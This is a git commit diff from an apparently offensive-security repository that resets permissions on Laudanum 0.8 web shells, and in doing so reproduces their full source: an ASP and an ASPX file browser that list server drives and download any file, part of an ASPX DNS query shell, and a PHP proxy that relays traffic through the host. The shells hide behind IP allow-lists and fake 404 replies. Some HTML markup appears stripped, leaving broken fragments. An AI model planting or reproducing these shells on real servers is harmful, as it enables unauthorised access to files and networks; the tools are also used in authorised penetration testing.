From 7018c294f5ffd7fcb47a0ceba42e0c3e4141d117 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Mon, 5 Mar 2018 10:01:10 +0000 Subject: [PATCH] Set file permissions --- Web-Shells/WordPress/access.php | 0 Web-Shells/laudanum-0.8/CREDITS | 0 Web-Shells/laudanum-0.8/GPL | 0 Web-Shells/laudanum-0.8/README | 0 Web-Shells/laudanum-0.8/asp/file.asp | 358 ++++----- Web-Shells/laudanum-0.8/aspx/dns.aspx | 288 +++---- Web-Shells/laudanum-0.8/aspx/file.aspx | 306 ++++---- Web-Shells/laudanum-0.8/cfm/shell.cfm | 0 Web-Shells/laudanum-0.8/jsp/cmd.war | Bin .../jsp/warfiles/META-INF/MANIFEST.MF | 6 +- .../laudanum-0.8/jsp/warfiles/WEB-INF/web.xml | 0 Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp | 0 Web-Shells/laudanum-0.8/php/proxy.php | 702 +++++++++--------- 13 files changed, 830 insertions(+), 830 deletions(-) mode change 100644 => 100755 Web-Shells/WordPress/access.php mode change 100755 => 100644 Web-Shells/laudanum-0.8/CREDITS mode change 100755 => 100644 Web-Shells/laudanum-0.8/GPL mode change 100755 => 100644 Web-Shells/laudanum-0.8/README mode change 100755 => 100644 Web-Shells/laudanum-0.8/cfm/shell.cfm mode change 100755 => 100644 Web-Shells/laudanum-0.8/jsp/cmd.war mode change 100755 => 100644 Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF mode change 100755 => 100644 Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml mode change 100755 => 100644 Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp diff --git a/Web-Shells/WordPress/access.php b/Web-Shells/WordPress/access.php old mode 100644 new mode 100755 diff --git a/Web-Shells/laudanum-0.8/CREDITS b/Web-Shells/laudanum-0.8/CREDITS old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/GPL b/Web-Shells/laudanum-0.8/GPL old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/README b/Web-Shells/laudanum-0.8/README old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/asp/file.asp b/Web-Shells/laudanum-0.8/asp/file.asp index cc0faff8..8b306850 100755 --- a/Web-Shells/laudanum-0.8/asp/file.asp +++ b/Web-Shells/laudanum-0.8/asp/file.asp @@ -1,179 +1,179 @@ -<%@Language="VBScript"%> -<%Option Explicit%> -<%Response.Buffer = True%> -<% -' ******************************************************************************* -' *** -' *** Laudanum Project -' *** A Collection of Injectable Files used during a Penetration Test -' *** -' *** More information is available at: -' *** http://laudanum.secureideas.net -' *** laudanum@secureideas.net -' *** -' *** Project Leads: -' *** Kevin Johnson -' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team -' *** -' ******************************************************************************** -' *** -' *** This file provides access to the file system. -' *** Written by Tim Medin -' *** -' ******************************************************************************** -' *** This program is free software; you can redistribute it and/or -' *** modify it under the terms of the GNU General Public License -' *** as published by the Free Software Foundation; either version 2 -' *** of the License, or (at your option) any later version. -' *** -' *** This program is distributed in the hope that it will be useful, -' *** but WITHOUT ANY WARRANTY; without even the implied warranty of -' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -' *** GNU General Public License for more details. -' *** -' *** You can get a copy of the GNU General Public License from this -' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 -' *** You can also write to the Free Software Foundation, Inc., Temple -' *** Place - Suite Boston, MA USA. -' *** -' ***************************************************************************** */ - -' ***************** Config entries below *********************** - -' Define variables -Dim allowedIPs -Dim allowed -Dim filepath -Dim file -Dim stream -Dim path -Dim i -Dim fso -Dim folder -Dim list -Dim temppath - -' IPs are enterable as individual addresses TODO: add CIDR support -allowedIPs = "192.168.0.1,127.0.0.1,::1" -' Just in cace you added a space in the line above -allowedIPs = replace(allowedIPS," ","") -'turn it into an array -allowedIPs = split(allowedIPS,",") ' -' make sure the ip is allowed -allowed = 0 -for i = lbound(allowedIPs) to ubound(allowedIPs) - if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then - allowed = 1 - exit for - end if -next -' send a 404 if the IP Address is not allowed -if allowed = 0 then - Response.Status = "404 File Not Found" - Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) - Response.End -end if - -' create file object for use everywhere -set fso = CreateObject("Scripting.FileSystemObject") - -' download a file if selected -filepath = trim(Request.QueryString("file")) -'validate file -if len(filepath) > 0 then - if fso.FileExists(filepath) then - 'valid file - - Set file = fso.GetFile(filepath) - Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name - 'Response.AddHeader "Content-Length", file.Size - Response.ContentType = "application/octet-stream" - set stream = Server.CreateObject("ADODB.Stream") - stream.Open - stream.Type = 1 - Response.Charset = "UTF-8" - stream.LoadFromFile(file.Path) - ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. - Response.BinaryWrite(stream.Read) - stream.Close - set stream = Nothing - set file = Nothing - Response.End - end if -end if - -' begin rendering the page -%> - - - Laudanum ASP File Browser - - - -

Laudanum File Browser 0.1

- -<% -' get the path to work with, if it isn't set or valid then start with the web root -' goofy if statement is used since vbscript doesn't use short-curcuit logic -path = trim(Request.QueryString("path")) -if len(path) = 0 then - path = fso.GetFolder(Server.MapPath("\")) -elseif not fso.FolderExists(path) then - path = fso.GetFolder(Server.MapPath("\")) -end if - -set folder = fso.GetFolder(path) - -' Special locations, webroot and drives -%>Other Locations: <% -for each i in fso.Drives - if i.IsReady then - %><%=i.DriveLetter%>:  <% - end if -next -%>">web root
<% - -' Information on folder -%>

Listing of: <% -list = split(folder.path, "\") -temppath = "" -for each i in list - temppath = temppath & i & "\" - %><%=i%>\ <% -next -%>

<% - -' build table for listing -%> -<% -' Parent Path if it exists -if not folder.IsRootFolder then - %><% -end if - -' Get the folders -set list = folder.SubFolders -for each i in list - %><% -next - -' Get the files -set list = folder.Files -for each i in list - %><% -next - -' all done -%> -
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
-
-
- Copyright © 2012, Kevin Johnson and the Laudanum team.
- Written by Tim Medin.
- Get the latest version at laudanum.secureideas.net. -
- - - +<%@Language="VBScript"%> +<%Option Explicit%> +<%Response.Buffer = True%> +<% +' ******************************************************************************* +' *** +' *** Laudanum Project +' *** A Collection of Injectable Files used during a Penetration Test +' *** +' *** More information is available at: +' *** http://laudanum.secureideas.net +' *** laudanum@secureideas.net +' *** +' *** Project Leads: +' *** Kevin Johnson +' *** +' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** +' ******************************************************************************** +' *** +' *** This file provides access to the file system. +' *** Written by Tim Medin +' *** +' ******************************************************************************** +' *** This program is free software; you can redistribute it and/or +' *** modify it under the terms of the GNU General Public License +' *** as published by the Free Software Foundation; either version 2 +' *** of the License, or (at your option) any later version. +' *** +' *** This program is distributed in the hope that it will be useful, +' *** but WITHOUT ANY WARRANTY; without even the implied warranty of +' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +' *** GNU General Public License for more details. +' *** +' *** You can get a copy of the GNU General Public License from this +' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +' *** You can also write to the Free Software Foundation, Inc., Temple +' *** Place - Suite Boston, MA USA. +' *** +' ***************************************************************************** */ + +' ***************** Config entries below *********************** + +' Define variables +Dim allowedIPs +Dim allowed +Dim filepath +Dim file +Dim stream +Dim path +Dim i +Dim fso +Dim folder +Dim list +Dim temppath + +' IPs are enterable as individual addresses TODO: add CIDR support +allowedIPs = "192.168.0.1,127.0.0.1,::1" +' Just in cace you added a space in the line above +allowedIPs = replace(allowedIPS," ","") +'turn it into an array +allowedIPs = split(allowedIPS,",") ' +' make sure the ip is allowed +allowed = 0 +for i = lbound(allowedIPs) to ubound(allowedIPs) + if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then + allowed = 1 + exit for + end if +next +' send a 404 if the IP Address is not allowed +if allowed = 0 then + Response.Status = "404 File Not Found" + Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR")) + Response.End +end if + +' create file object for use everywhere +set fso = CreateObject("Scripting.FileSystemObject") + +' download a file if selected +filepath = trim(Request.QueryString("file")) +'validate file +if len(filepath) > 0 then + if fso.FileExists(filepath) then + 'valid file + + Set file = fso.GetFile(filepath) + Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name + 'Response.AddHeader "Content-Length", file.Size + Response.ContentType = "application/octet-stream" + set stream = Server.CreateObject("ADODB.Stream") + stream.Open + stream.Type = 1 + Response.Charset = "UTF-8" + stream.LoadFromFile(file.Path) + ' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb. + Response.BinaryWrite(stream.Read) + stream.Close + set stream = Nothing + set file = Nothing + Response.End + end if +end if + +' begin rendering the page +%> + + + Laudanum ASP File Browser + + + +

Laudanum File Browser 0.1

+ +<% +' get the path to work with, if it isn't set or valid then start with the web root +' goofy if statement is used since vbscript doesn't use short-curcuit logic +path = trim(Request.QueryString("path")) +if len(path) = 0 then + path = fso.GetFolder(Server.MapPath("\")) +elseif not fso.FolderExists(path) then + path = fso.GetFolder(Server.MapPath("\")) +end if + +set folder = fso.GetFolder(path) + +' Special locations, webroot and drives +%>Other Locations: <% +for each i in fso.Drives + if i.IsReady then + %><%=i.DriveLetter%>:  <% + end if +next +%>">web root
<% + +' Information on folder +%>

Listing of: <% +list = split(folder.path, "\") +temppath = "" +for each i in list + temppath = temppath & i & "\" + %><%=i%>\ <% +next +%>

<% + +' build table for listing +%> +<% +' Parent Path if it exists +if not folder.IsRootFolder then + %><% +end if + +' Get the folders +set list = folder.SubFolders +for each i in list + %><% +next + +' Get the files +set list = folder.Files +for each i in list + %><% +next + +' all done +%> +
NameSizeModifiedAccessedCreated
..
<%=i.Name%>\
<%=i.Name%><%=FormatNumber(i.Size, 0)%><%=i.DateLastModified%><%=i.DateLastAccessed%><%=i.DateCreated%>
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-0.8/aspx/dns.aspx b/Web-Shells/laudanum-0.8/aspx/dns.aspx index f82ed13a..0ddf8eec 100755 --- a/Web-Shells/laudanum-0.8/aspx/dns.aspx +++ b/Web-Shells/laudanum-0.8/aspx/dns.aspx @@ -1,144 +1,144 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - DNS - -
-QUERY:
-Type: -
-STDOUT:
-
<% = stdout.Replace("<", "<") %>
-
-
-
-STDERR:
-
<% = stderr.Replace("<", "<") %>
- - - +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - DNS + + +QUERY:
+Type: +
+STDOUT:
+
<% = stdout.Replace("<", "<") %>
+
+
+
+STDERR:
+
<% = stderr.Replace("<", "<") %>
+ + + diff --git a/Web-Shells/laudanum-0.8/aspx/file.aspx b/Web-Shells/laudanum-0.8/aspx/file.aspx index f71fa431..52108a87 100755 --- a/Web-Shells/laudanum-0.8/aspx/file.aspx +++ b/Web-Shells/laudanum-0.8/aspx/file.aspx @@ -1,154 +1,154 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - File - - - -<% string[] breadcrumbs = dir.Split('\\'); - string breadcrumb = ""; - foreach (string b in breadcrumbs) - { - if (b.Length > 0) - { - breadcrumb += b + "\\"; - Response.Write("" + Server.HtmlEncode(b) + ""); - Response.Write(" / "); - } - } - %> - - -<% - try - { - if (System.IO.Directory.Exists(dir)) - { - string[] folders = System.IO.Directory.GetDirectories(dir); - foreach (string folder in folders) - { - Response.Write(""); - } - } - else - { - Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); - Response.End(); - } - - } - catch (System.UnauthorizedAccessException ex) - { - Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); - Response.End(); - } - %> - -<% - System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); - System.IO.FileInfo[] files = di.GetFiles(); - foreach (System.IO.FileInfo f in files) - { - Response.Write(""); - } - %> -
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
- +<%@ Page Language="C#"%> +<%@ Import Namespace="System" %> +Laudanum - File + + + +<% string[] breadcrumbs = dir.Split('\\'); + string breadcrumb = ""; + foreach (string b in breadcrumbs) + { + if (b.Length > 0) + { + breadcrumb += b + "\\"; + Response.Write("" + Server.HtmlEncode(b) + ""); + Response.Write(" / "); + } + } + %> + + +<% + try + { + if (System.IO.Directory.Exists(dir)) + { + string[] folders = System.IO.Directory.GetDirectories(dir); + foreach (string folder in folders) + { + Response.Write(""); + } + } + else + { + Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); + Response.End(); + } + + } + catch (System.UnauthorizedAccessException ex) + { + Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); + Response.End(); + } + %> + +<% + System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); + System.IO.FileInfo[] files = di.GetFiles(); + foreach (System.IO.FileInfo f in files) + { + Response.Write(""); + } + %> +
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
+ \ No newline at end of file diff --git a/Web-Shells/laudanum-0.8/cfm/shell.cfm b/Web-Shells/laudanum-0.8/cfm/shell.cfm old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/jsp/cmd.war b/Web-Shells/laudanum-0.8/jsp/cmd.war old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF old mode 100755 new mode 100644 index 1df33912..ac536771 --- a/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF +++ b/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF @@ -1,3 +1,3 @@ -Manifest-Version: 1.0 -Created-By: 1.6.0_10 (Sun Microsystems Inc.) - +Manifest-Version: 1.0 +Created-By: 1.6.0_10 (Sun Microsystems Inc.) + diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp b/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp old mode 100755 new mode 100644 diff --git a/Web-Shells/laudanum-0.8/php/proxy.php b/Web-Shells/laudanum-0.8/php/proxy.php index 1176fcde..93a8da1c 100755 --- a/Web-Shells/laudanum-0.8/php/proxy.php +++ b/Web-Shells/laudanum-0.8/php/proxy.php @@ -1,351 +1,351 @@ - -*** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team -*** -******************************************************************************** -*** -*** This file allows browsing of the file system. -*** Written by Tim Medin -*** -******************************************************************************** -*** This program is free software; you can redistribute it and/or -*** modify it under the terms of the GNU General Public License -*** as published by the Free Software Foundation; either version 2 -*** of the License, or (at your option) any later version. -*** -*** This program is distributed in the hope that it will be useful, -*** but WITHOUT ANY WARRANTY; without even the implied warranty of -*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -*** GNU General Public License for more details. -*** -*** You can get a copy of the GNU General Public License from this -*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 -*** You can also write to the Free Software Foundation, Inc., 59 Temple -*** Place - Suite 330, Boston, MA 02111-1307, USA. -*** -***************************************************************************** */ - -// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page -// figure out how to reuse sessionid from the remote site - -// ***************** Config entries below *********************** - -// IPs are enterable as individual addresses TODO: add CIDR support -$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); - -# *********** No editable content below this line ************** - -$allowed = 0; -foreach ($allowedIPs as $IP) { - if ($_SERVER["REMOTE_ADDR"] == $IP) - $allowed = 1; -} - -if ($allowed == 0) { - header("HTTP/1.0 404 Not Found"); - die(); -} - -/* This error handler will turn all notices, warnings, and errors into fatal - * errors, unless they have been suppressed with the @-operator. */ -function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { - /* The @-opertor (used with chdir() below) temporarely makes - * error_reporting() return zero, and we don't want to die in that case. - * We do note the error in the output, though. */ - if (error_reporting() == 0) { - $_SESSION['output'] .= $errstr . "\n"; - } else { - die(' - - - Laudanum PHP Proxy - - -

Fatal Error!

-

' . $errstr . '

-

in ' . $errfile . ', line ' . $errline . '.

- -
-
- Copyright © 2012, Kevin Johnson and the Laudanum team.
- Written by Tim Medin.
- Get the latest version at laudanum.secureideas.net. -
- - -'); - } -} - -set_error_handler('error_handler'); - -function geturlarray($u) { - // creates the url array, addes a scheme if it is missing and retries parsing - $o = parse_url($u); - if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } - if (!isset($o["path"])) { $o["path"] = "/"; } - return $o; -} - -function buildurl ($u) { - // build the url from the url array - // this is used because the built in function isn't - // avilable in all installs of php - if (!isset($u["host"])) { return null; } - - $s = isset($u["scheme"]) ? $u["scheme"] : "http"; - $s .= "://" . $u["host"]; - $s .= isset($u["port"]) ? ":" . $u["port"] : ""; - $s .= isset($u["path"]) ? $u["path"] : "/"; - $s .= isset($u["query"]) ? "?" . $u["query"] : ""; - $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; - return $s; -} - -function buildurlpath ($u) { - //gets the full url and attempts to remove the file at the end of the url - // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ - if (!isset($u["host"])) { return null; } - - $s = isset($u["scheme"])? $u["scheme"] : "http"; - $s .= "://" . $u["host"]; - $s .= isset($u["port"]) ? ":" . $u["port"] : ""; - - $path = isset($u["path"]) ? $u["path"] : "/"; - // is the last portion of the path a file or a dir? - // assume if there is a . it is a file - // if it ends in a / then it is a dir - // if neither, than assume dir - $dirs = explode("/", $path); - $last = $dirs[count($dirs) - 1]; - if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { - // its a file, remove the last chunk - $path = substr($path, 0, -1 * strlen($last)); - } - - $s .= $path; - return $s; -} - -function getfilename ($u) { - // returns the file name - // e.g. http://blah.com/dir/file.ext returns file.ext - // technically, it is the last portion of the url, so there is a potential - // for a problem if a http://blah.com/dir returns a file - $s = explode("/", $u["path"]); - return $s[count($s) - 1]; -} - -function getcontenttype ($headers) { - // gets the content type - foreach($headers as $h) { - if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { - return $out[1][0]; - } - } -} - -function getcontentencoding ($headers) { - foreach ($headers as $h) { - if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { - return $out[1][0]; - } - } -} - -function removeheader($header, $headers) { - foreach (array_keys($headers) as $key) { - if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { - unset($headers[$key]); - return $headers; - } - } -} - -function rewritecookies($headers) { - // removes the path and domain from cookies - for ($i = 0; $i < count($headers); $i++) { - if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { - $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); - $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); - } - } - return $headers; -} - -function getsessionid($headers) { - for ($i = 0; $i < count($headers); $i++) { - if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) - return $out[1][0]; - } - return "0"; -} - -function compatible_gzinflate($gzData) { - if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { - $i = 10; - $flg = ord( substr($gzData, 3, 1) ); - if ( $flg > 0 ) { - if ( $flg & 4 ) { - list($xlen) = unpack('v', substr($gzData, $i, 2) ); - $i = $i + 2 + $xlen; - } - if ( $flg & 8 ) - $i = strpos($gzData, "\0", $i) + 1; - if ( $flg & 16 ) - $i = strpos($gzData, "\0", $i) + 1; - if ( $flg & 2 ) - $i = $i + 2; - } - return @gzinflate( substr($gzData, $i, -8) ); - } else { - return false; - } - return false; -} - -function rewrite ($d, $u) { - $r = $d; - //rewrite images and links - absolute reference - $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); - //rewrite images and links - hard linked - $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); - //rewrite images and links - relative reference - $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); - - - //rewrite form - absolute reference - $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); - //rewrite form - hard linked - $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); - //rewrite form - relative reference - $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); - return $r; -} - -/* Initialize some variables we need again and again. */ -$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; -if ($url == "") { - $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; -} - -if ($url == "") { -?> - - - - Laudanum PHP Proxy - - - - - - -

Laudanum PHP Proxy

- - - - - -
-
- Copyright © 2012, Kevin Johnson and the Laudanum team.
- Written by Tim Medin.
- Get the latest version at laudanum.secureideas.net. -
- - - - + +*** +*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file allows browsing of the file system. +*** Written by Tim Medin +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page +// figure out how to reuse sessionid from the remote site + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Proxy + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + +function geturlarray($u) { + // creates the url array, addes a scheme if it is missing and retries parsing + $o = parse_url($u); + if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } + if (!isset($o["path"])) { $o["path"] = "/"; } + return $o; +} + +function buildurl ($u) { + // build the url from the url array + // this is used because the built in function isn't + // avilable in all installs of php + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"]) ? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + $s .= isset($u["path"]) ? $u["path"] : "/"; + $s .= isset($u["query"]) ? "?" . $u["query"] : ""; + $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; + return $s; +} + +function buildurlpath ($u) { + //gets the full url and attempts to remove the file at the end of the url + // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ + if (!isset($u["host"])) { return null; } + + $s = isset($u["scheme"])? $u["scheme"] : "http"; + $s .= "://" . $u["host"]; + $s .= isset($u["port"]) ? ":" . $u["port"] : ""; + + $path = isset($u["path"]) ? $u["path"] : "/"; + // is the last portion of the path a file or a dir? + // assume if there is a . it is a file + // if it ends in a / then it is a dir + // if neither, than assume dir + $dirs = explode("/", $path); + $last = $dirs[count($dirs) - 1]; + if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { + // its a file, remove the last chunk + $path = substr($path, 0, -1 * strlen($last)); + } + + $s .= $path; + return $s; +} + +function getfilename ($u) { + // returns the file name + // e.g. http://blah.com/dir/file.ext returns file.ext + // technically, it is the last portion of the url, so there is a potential + // for a problem if a http://blah.com/dir returns a file + $s = explode("/", $u["path"]); + return $s[count($s) - 1]; +} + +function getcontenttype ($headers) { + // gets the content type + foreach($headers as $h) { + if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function getcontentencoding ($headers) { + foreach ($headers as $h) { + if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { + return $out[1][0]; + } + } +} + +function removeheader($header, $headers) { + foreach (array_keys($headers) as $key) { + if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { + unset($headers[$key]); + return $headers; + } + } +} + +function rewritecookies($headers) { + // removes the path and domain from cookies + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { + $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); + $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); + } + } + return $headers; +} + +function getsessionid($headers) { + for ($i = 0; $i < count($headers); $i++) { + if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) + return $out[1][0]; + } + return "0"; +} + +function compatible_gzinflate($gzData) { + if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { + $i = 10; + $flg = ord( substr($gzData, 3, 1) ); + if ( $flg > 0 ) { + if ( $flg & 4 ) { + list($xlen) = unpack('v', substr($gzData, $i, 2) ); + $i = $i + 2 + $xlen; + } + if ( $flg & 8 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 16 ) + $i = strpos($gzData, "\0", $i) + 1; + if ( $flg & 2 ) + $i = $i + 2; + } + return @gzinflate( substr($gzData, $i, -8) ); + } else { + return false; + } + return false; +} + +function rewrite ($d, $u) { + $r = $d; + //rewrite images and links - absolute reference + $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); + //rewrite images and links - hard linked + $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); + //rewrite images and links - relative reference + $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); + + + //rewrite form - absolute reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - hard linked + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + //rewrite form - relative reference + $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); + return $r; +} + +/* Initialize some variables we need again and again. */ +$url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; +if ($url == "") { + $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; +} + +if ($url == "") { +?> + + + + Laudanum PHP Proxy + + + + + + +

Laudanum PHP Proxy

+ +
+ + +
+
+
+ Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + +